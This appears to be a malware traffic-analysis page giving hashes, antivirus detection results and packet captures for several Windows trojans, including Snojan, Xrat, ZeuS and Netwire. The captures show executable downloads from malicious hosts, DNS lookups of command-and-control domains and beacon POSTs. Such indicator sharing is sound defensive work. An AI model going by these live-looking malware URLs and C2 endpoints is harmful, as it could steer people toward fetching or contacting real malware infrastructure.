Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC ( 0 minutes ago )
Antivirus Result Update
ALYac Trojan.GenericKD.4294253 20170220
AVG Agent5.AXHG 20170220
AVware Trojan.Win32.Generic!BT 20170220
Ad-Aware Trojan.GenericKD.4294253 20170220
AegisLab Uds.Dangerousobject.Multi!c 20170220
AhnLab-V3 Trojan/Win32.Snojan.C1770480 20170219
Arcabit Trojan.Generic.D41866D 20170220
Avast Win32:Malware-gen 20170220
Avira (no cloud) TR/Crypt.ZPACK.wcpog 20170219
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170217
BitDefender Trojan.GenericKD.4294253 20170220
Bkav HW32.Packed.3570 20170218
CAT-QuickHeal Trojan.Dynamer 20170218
ClamAV Win.Trojan.Generic-5747581-0 20170220
Comodo UnclassifiedMalware 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
E..E}.@….f…f…_.7.P.^$UN..rP…….GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
E..;(……)…fKKKK.~.5.’…………..        mutinenag.com…..
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..O(……….fKKKK…5.;[..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..OFa………fKKLL…5.;Y..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Y………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
E..O(……….fKKKK…5.;..W…………v10
vortex-win.data microsoft.com…..
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
E..:(……&…fKKKK…5.&.o@K………..mumeraxo.com…..
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..N(……….fKKKK.q.5.:Im5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..NFe………fKKLL.q.5.:Hl5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Z………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……”…fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……!…fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(…… …fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fi………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fj………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fk………fKKLL.t.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.u.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options

2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
E…m[@……..f].y/.;.P…8..N.P…….POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
E..(m\@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
E..(m]@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fp………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fq………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    [………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.w.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.x.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fu………fKKLL.v.5.&|…………..fifexont.com…..
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fv………fKKLL.w.5.&|…………..fifexont.com…..

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
E…D.@….1…f].y….P`?Y…..P….’..POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fw………fKKLL.x.5.&|…………..fifexont.com…..
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
E..E)……….fKKKK…5.13…………..tele.trafficmanager.net…..
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45A@….8…f..2M…P………. .r……………
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
E..(.W@….t…fA7…….._.c./.P………….
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
E..(5B@….C…f..2M…P…….>P…0………
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
E…5C@……..f..2M…P…….>P…….GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net

Trojan Crypt Password Stealer Malware turbo.exe 157.56.31.43 Port 3544/UDP PCAP file download Traffic Sample

SHA256: b31c4f30f37be6a0ea904019fcce94319fd59215fe06d52a265946be088d2592
File name: turbo.exe
Detection ratio: 48 / 58
Analysis date: 2017-02-20 04:48:47 UTC ( 0 minutes ago )
Cyren W32/Trojan.YHFN-2823 20170220
DrWeb Trojan.PWS.Stealer.15842 20170220
ESET-NOD32 a variant of Win32/Injector.DKFX 20170219
Emsisoft Trojan.GenericKD.4236515 (B) 20170220
F-Secure Trojan.GenericKD.4236515 20170220
Fortinet W32/Injector.DJWH!tr 20170220
GData Trojan.GenericKD.4236515 20170220
Ikarus Trojan.Win32.Injector 20170219
K7AntiVirus Trojan ( 005036d71 ) 20170220
K7GW Trojan ( 005036d71 ) 20170220
Kaspersky Trojan.Win32.Agent.neytzz 20170220
Malwarebytes Trojan.Crypt 20170220
McAfee Trojan-FLBV!22730AE47ACC 20170220
McAfee-GW-Edition Trojan-FLBV!22730AE47ACC

2017-02-18 07:20:52.112791 IP 192.168.1.102.55812 > 182.255.5.201.80: Flags [P.], seq 0:416, ack 1, win 256, length 416: HTTP: GET /~bemkmund/two/turbo.exe HTTP/1.1
E…=.@…<….f…….P0.H..P.0P…k…GET /~bemkmund/two/turbo.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=243275-
Unless-Modified-Since: Mon, 23 Jan 2017 15:24:32 GMT
If-Range: “983c9c-1b5000-546c498a46c00”
Host: 182.255.5.201
Connection: Keep-Alive

2017-02-18 07:21:19.360454 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    B………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:21:43.787645 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    C………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:22:07.487712 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    D………f.8.+.J…E……..RH…’.`…..:……………………………..}8….

Xrat-R Remote Access Trojan h1h1tl3r.click Off1c3v4l1dK3y2017s.exe Malware Backdoor PCAP file Download Traffic Analysis

Troj/Xrat-R exhibits the following characteristics:

File Information

Size
1.1M
SHA-1
5c533a9f95f69c98f5926810f0cf78fa7a6cf447
MD5
c6e081d416d2bde4d450f7dc34c1351c
CRC-32
f70ab7ef
File type
Windows executable
First seen
2016-12-11

Runtime Analysis

Registry Keys Created
  • HKCU\Software\zUB8dknwC
    InstalledServer
    c:\Documents and Settings\test user\Application Data\f6hjg\28dpo.exe
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    GWlgQh
    C:\GWlgQhGWlgQh\GWlgQh.vbs
Processes Created
  • c:\Documents and Settings\test user\application data\f6hjg\28dpo.exe
  • c:\windows\microsoft.net\framework\v2.0.50727\csc.exe

2017-02-18 07:24:47.085846 IP 192.168.1.102.55839 > 108.179.232.87.80: Flags [P.], seq 0:317, ack 1, win 256, length 317: HTTP: GET /Off1c3v4l1dK3y2017s.exe HTTP/1.1
E..e..@….y…fl..W…P….e.Q.P…….GET /Off1c3v4l1dK3y2017s.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dryversdocumentsandcustomer.com
Connection: Keep-Alive

2017-02-18 07:26:16.924122 IP 192.168.1.102.62494 > 75.75.75.75.53: 42747+ A? sslwin.moneyhome.biz. (38)
E..B(……/…fKKKK…5…0………….sslwin moneyhome.biz…..
2017-02-18 07:26:17.036254 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4f.@….”…f..H..(..i|
……. .5Y…………..
2017-02-18 07:26:20.036795 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4f.@….!…f..H..(..i|
……. .5Y…………..
2017-02-18 07:26:26.037104 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0f.@….$…f..H..(..i|
…..p. .Ih……….
2017-02-18 07:26:34.553249 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    O………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:26:43.302596 IP 192.168.1.102.60917 > 75.75.75.75.53: 53811+ A? d.dropbox.com. (31)
E..;(……5…fKKKK…5.’…3………..d.dropbox.com…..
2017-02-18 07:26:48.033633 IP 192.168.1.102.60918 > 75.75.75.75.53: 26266+ A? c0pywins.is-not-certified.com. (47)
E..K(……$…fKKKK…5.7t.f…………c0pywins.is-not-certified.com…..

2017-02-18 07:27:19.096213 IP 192.168.1.102.61329 > 75.75.75.75.53: 53682+ A? h1h1tl3r.click. (32)
E..<(……….fKKKK…5.(c/………….h1h1tl3r.click…..
2017-02-18 07:27:19.231571 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@…1….f……….6……. ……………..
2017-02-18 07:27:20.699792 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Q………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:27:22.231434 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@…1….f……….6……. ……………..
2017-02-18 07:27:28.231236 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0R   @…1….f……….6…..p. .-

ZBOT ZeuS Banking Trojan Malware melonia.exe PCAP file download Traffic Sample 91.195.103.14

SHA256: 149fda05458720c56fe36871c2d8991a4f67ad87fb512873c6e7b481fca078c0
File name: melonia.exe
Detection ratio: 13 / 58
Analysis date: 2017-02-20 04:22:36 UTC ( 0 minutes ago )
Antivirus Result Update
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9990 20170217
BitDefender Gen:Variant.Midie.35271 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20170130
Endgame malicious (high confidence) 20170217
Invincea trojandropper.win32.small.pq 20170203
K7GW Hacktool ( 655367771 ) 20170220
Kaspersky UDS:DangerousObject.Multi.Generic 20170220
Malwarebytes Trojan.Xcsidl 20170220
McAfee Artemis!395315BF3E1F 20170220
McAfee-GW-Edition Artemis 20170219
Qihoo-360 HEUR/QVM07.1.0000.Malware.Gen 20170220
Symantec ML.Attribute.HighConfidence 20170219
Webroot Malicious 20170220

 

Troj/Zbot-LMH exhibits the following characteristics:

File Information

Size
124K
SHA-1
8d7bc351ed622a28d1c4db09da6ea8c156099581
MD5
a6c8dfd98f730c2d9aa33e521acf4514
CRC-32
8a762a91
File type
Windows executable
First seen
2016-07-12

 

2017-02-18 07:18:10.284472 IP 192.168.1.102.55783 > 91.195.103.14.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /melonia.exe HTTP/1.1
E..G+.@…H….f[.g….P..k…m`P…….GET /melonia.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 91.195.103.14
Connection: Keep-Alive

017-02-18 07:18:26.395354 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    ;………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:18:32.281760 IP 192.168.1.102.55784 > 85.17.31.111.80: Flags [S], seq 1022274422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….a…fU..o…P<..v…… .U……………
2017-02-18 07:18:32.282703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4T.@….T…fNX.w…PI……… .vV…………..
2017-02-18 07:18:32.282905 IP 192.168.1.102.55786 > 197.45.139.121.80: Flags [S], seq 1410864012, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4f.@……..f.-.y…PT……… ..{…………..
2017-02-18 07:18:32.283680 IP 192.168.1.102.55787 > 212.45.72.145.80: Flags [S], seq 3977795037, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    .@……..f.-H….P..U……. .S……………
2017-02-18 07:18:32.283856 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [S], seq 3145529474, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4` @….q…fI.r….P.|…….. .B……………
2017-02-18 07:18:32.355074 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [.], ack 3468195037, win 256, length 0
E..(`!@….|…fI.r….P.|….t.P…^………
2017-02-18 07:18:32.372025 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [F.], seq 0, ack 1, win 256, length 0
E..(`”@….{…fI.r….P.|….t.P…^………
2017-02-18 07:18:32.389522 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4`#@….n…fI.r….P………. ……………..
2017-02-18 07:18:32.412338 IP 192.168.1.102.55784 > 85.17.31.111.80: Flags [.], ack 3488374086, win 256, length 0
E..(..@….l…fU..o…P<..w..]FP….t……..
2017-02-18 07:18:32.463521 IP 192.168.1.102.55787 > 212.45.72.145.80: Flags [.], ack 757101935, win 256, length 0
E..(    .@……..f.-H….P..U.- uoP….E……..
2017-02-18 07:18:32.483076 IP 192.168.1.102.55786 > 197.45.139.121.80: Flags [.], ack 306858242, win 64952, length 0
E..(f.@……..f.-.y…PT….JI.P….:……..
2017-02-18 07:18:32.916124 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4`$@….m…fI.r….P………. ……………..
2017-02-18 07:18:33.150537 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [.], ack 2, win 256, length 0
E..(`%@….x…fI.r….P.|….t.P…^………
2017-02-18 07:18:33.446215 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0`&@….o…fI.r….P……..p. ………….
2017-02-18 07:18:33.485592 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [.], ack 3792818486, win 64240, length 0
E..(`’@….v…fI.r….P…….6P…y)……..
2017-02-18 07:18:33.503674 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 0:164, ack 1, win 64240, length 164: HTTP
E…`(@……..fI.r….P…….6P………..lUUE..H@./.d.R;.!.1OQ…0F.A…{….Tkq……Um..}……….?)yO…………j7.K.*..v8…..PY…….n2.OI3^v..6….1O..g….k.Y.~.T+..Z?t.%…..{..1…….K|/.B
2017-02-18 07:18:33.703225 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 0:164, ack 1, win 64240, length 164: HTTP
E…`)@……..fI.r….P…….6P………..lUUE..H@./.d.R;.!.1OQ…0F.A…{….Tkq……Um..}……….?)yO…………j7.K.*..v8…..PY…….n2.OI3^v..6….1O..g….k.Y.~.T+..Z?t.%…..{..1…….K|/.B
2017-02-18 07:18:35.237008 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 164:1624, ack 238, win 64003, length 1460: HTTP
E…`*@……..fI.r….P../&…#P…`6…..K…….7.’..S………Mj..i
4…zq`…|…..’……%………

2017-02-18 07:18:39.928486 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4pW@…2….f[.9….Px.h……. .<……………
2017-02-18 07:18:39.928906 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4]4@…
….fs.\….P..s……. ……………..
2017-02-18 07:18:39.929119 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4cX@……..fz……P………. ..V…………..
2017-02-18 07:18:39.929297 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<.@…q,…fM.<….P.#…….. ./……………
2017-02-18 07:18:39.929473 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.O@…u….fm.T….P………. ……………..
2017-02-18 07:18:41.283703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0T.@….V…fNX.w…PI…….p….e……….
2017-02-18 07:18:42.928918 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4pX@…2….f[.9….Px.h……. .<……………
2017-02-18 07:18:42.928929 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.P@…u….fm.T….P………. ……………..
2017-02-18 07:18:42.929374 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4cY@……..fz……P………. ..V…………..
2017-02-18 07:18:42.929897 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4]5@…
….fs.\….P..s……. ……………..
2017-02-18 07:18:42.930440 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<.@…q+…fM.<….P.#…….. ./……………
2017-02-18 07:18:48.929730 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0pY@…2….f[.9….Px.h…..p. .P………..
2017-02-18 07:18:48.929740 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0cZ@……..fz……P……..p. ..e……….
2017-02-18 07:18:48.929743 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0.Q@…u….fm.T….P……..p. ………….
2017-02-18 07:18:48.930683 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0]6@…
….fs.\….P..s…..p. ………….
2017-02-18 07:18:48.931157 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0<.@…q….fM.<….P.#……p. .C………..
2017-02-18 07:18:49.863870 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    <………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:19:00.857340 IP 192.168.1.102.55795 > 46.149.62.141.80: Flags [S], seq 2819666092, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o
@…\….f..>….P………. ……………..
2017-02-18 07:19:00.857494 IP 192.168.1.102.55796 > 86.104.197.176.80: Flags [S], seq 862654258, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    \@….A…fVh…..P3k.2…… .T……………

d

Netwire Wirenet Trojan Downloader Malware 2017.exe PCAP file download traffic analysis

SHA256: 26989aa946a3c511b62b809bb98c2c7cf947ca5bfad628873ab3f6b94297b7d1
File name: 2017.exe
Detection ratio: 34 / 57
Analysis date: 2017-02-20 02:14:31 UTC ( 57 minutes ago )
AVG Autoit2_c.ACFW 20170220
AVware Trojan.Win32.Generic!BT 20170219
Ad-Aware Trojan.GenericKD.4425869 20170220
AegisLab Troj.W32.Gen.m5cP 20170220
Antiy-AVL Trojan/Generic.ASVCS3S.1E5 20170220
Arcabit Trojan.Generic.D43888D 20170220
Avira (no cloud) DR/Autoit.yobkp 20170219
BitDefender Trojan.GenericKD.4425869 20170219
Bkav W32.HfsAtITIST.FAB9 20170218
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
Cyren W32/Trojan.ICBN-4514 20170220
DrWeb BackDoor.Wirenet.187 20170220

Troj/Netwire-GZ

Category: Viruses and Spyware Protection available since: 07 Oct 2016 15:58:11 (GMT)
Type: Trojan Last Updated: 07 Oct 2016 15:58:11 (GMT)
Troj/Netwire-GZ exhibits the following characteristics:

File Information

Size
283K
SHA-1
d57e5c3b764a3a33a3e069b78794cc91a39805f8
MD5
64032694f59a03659420f6205852c662
CRC-32
e9e62086
File type
application/x-ms-dos-executable
First seen
2016-10-06

Runtime Analysis

HTTP Requests
  • http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt
DNS Requests
  • myfilesareok.ddns.net

 

 

2017-02-18 07:59:44.911543 IP 192.168.1.102.56166 > 192.185.145.173.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /includes/2017.exe HTTP/1.1
E..R#S@……..f…..f.P….F…P…….GET /includes/2017.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: peruvianflavor.com
Connection: Keep-Alive

2017-02-18 07:59:56.033673 IP 192.168.1.102.54470 > 75.75.75.75.53: 53705+ A? myfilesareok.ddns.net. (39)
E..C)_………fKKKK…5./:…………..myfilesareok.ddns.net…..
2017-02-18 07:59:56.069943 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…x….f./.*.g………… ……………..
2017-02-18 07:59:56.813999 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…x….f./.*.g………… ……………..
2017-02-18 07:59:57.556733 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…x….f./.*.g……….p. ………….
2017-02-18 07:59:58.269823 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
